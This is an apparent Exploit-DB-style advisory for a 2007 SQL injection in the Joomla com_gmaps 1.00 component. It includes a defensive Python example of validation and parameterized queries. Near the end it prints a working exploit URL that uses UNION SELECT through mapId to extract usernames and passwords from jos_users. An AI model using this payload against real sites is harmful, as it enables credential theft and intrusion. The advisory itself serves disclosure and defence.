vendor: com_gmaps
by: milw0rm.com
CVSS: N/A
HIGH
Remote SQL Injection
CWE: 89
Product Name: com_gmaps
Affected Version From: 1.00
Affected Version To: 1.00
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joomla com_gmaps 1.00 Remote SQL Injection

The exploit allows an attacker to execute unauthorized SQL queries through the Joomla com_gmaps 1.00 component. The mapId parameter of the viewmap task is passed into a query without sanitization, so an attacker can append a UNION SELECT to it and retrieve sensitive information such as usernames and passwords from the jos_users table.

Mitigation:

Upgrade to a patched version of the component or disable the vulnerable feature. Use input validation and parameterized queries to prevent SQL injection attacks.
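
The two controls named above, applied to a mapId lookup, as an added example (not code from com_gmaps or Joomla). It uses Python with an in-memory SQLite database as a stand-in for the component's PHP/MySQL code; the `demo_maps` table, its contents and all function names are assumptions made for the illustration.

```python
import sqlite3

def open_demo_db():
    # Constructed in-memory stand-in; tables and rows are sample data.
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE demo_maps (id INTEGER PRIMARY KEY, title TEXT);"
        "CREATE TABLE jos_users (username TEXT, password TEXT);"
        "INSERT INTO demo_maps VALUES (1, 'Office');"
        "INSERT INTO jos_users VALUES ('admin', 'constructed-hash');"
    )
    return db

def parse_map_id(raw):
    # Input validation (allow-list): 1 to 9 ASCII digits and nothing else.
    if not (isinstance(raw, str) and raw.isascii()
            and raw.isdigit() and len(raw) <= 9):
        raise ValueError("mapId must be a positive integer")
    return int(raw)

def view_map(db, raw_map_id):
    # Validate first, then bind the value; it is never spliced into SQL text.
    map_id = parse_map_id(raw_map_id)
    cur = db.execute("SELECT id, title FROM demo_maps WHERE id = ?", (map_id,))
    return cur.fetchone()

def view_map_bound_only(db, raw_map_id):
    # Parameter binding without validation: the whole string travels as one
    # value, so SQL keywords inside it are compared as data, not executed.
    cur = db.execute("SELECT id, title FROM demo_maps WHERE id = ?",
                     (raw_map_id,))
    return cur.fetchone()

if __name__ == "__main__":
    db = open_demo_db()
    # Constructed non-numeric input in the style of the request on this page.
    hostile = "-1/**/union/**/select/**/username/**/from/**/jos_users"
    print(view_map(db, "1"))
    print(view_map_bound_only(db, hostile))
    try:
        view_map(db, hostile)
    except ValueError as exc:
        print("rejected:", exc)
```

Validation rejects the request before any query runs, and binding keeps a value that slips past validation from changing the statement; using both gives defense in depth.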

Exploit-DB raw data:

joomla com_gmaps 1.00 Remote SQl Injection
 
Found: Cyber-Security
 
Exploit:
index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

# milw0rm.com [2007-07-31]